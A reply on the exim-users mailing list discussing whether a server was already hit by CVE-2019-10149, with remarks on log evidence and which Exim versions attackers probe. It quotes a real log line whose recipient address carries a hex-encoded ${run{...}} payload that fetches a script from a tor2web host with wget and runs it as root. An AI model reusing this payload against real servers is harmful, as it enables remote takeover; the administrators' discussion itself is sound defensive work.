Re: [exim] CVE-2019-10149: already vulnerable ?

Top Page
Delete this message
Reply to this message
Author: Heiko Schlittermann
Date:  
To: exim-users
Subject: Re: [exim] CVE-2019-10149: already vulnerable ?
Hello,

Thomas Hager via Exim-users <exim-users@???> (Fr 21 Jun 2019 21:26:11 CEST):
> > 2019-06-20 15:13:33 Received from <> H=(<zensored>.de)
> > [89.248.171.57] P=smtp S=1114
> > 2019-06-20 15:13:33 routing failed for
> > root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dchec
> > k\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\
> > x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x
> > 20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@<zen
> > sored>.de: Too many "Received" headers - suspected mail loop


As Andreas M pointed out, the logs are the same, independently of an
successfull attack. (Though a wise attacker would remove the log lines.)

It *seems* that the attackers test for the Exim version in the SMTP
banner. In servers having 4.92 I do not see as many attempts as on
4.87->4.91. But there may be other things influencing this.

    Best regards from Dresden/Germany
    Viele Grüße aus Dresden
    Heiko Schlittermann
--
 SCHLITTERMANN.de ---------------------------- internet & unix support -
 Heiko Schlittermann, Dipl.-Ing. (TU) - {fon,fax}: +49.351.802998{1,3} -
 gnupg encrypted messages are welcome --------------- key ID: F69376CE -
 ! key id 7CBF764A and 972EAC9F are revoked since 2015-01 ------------ -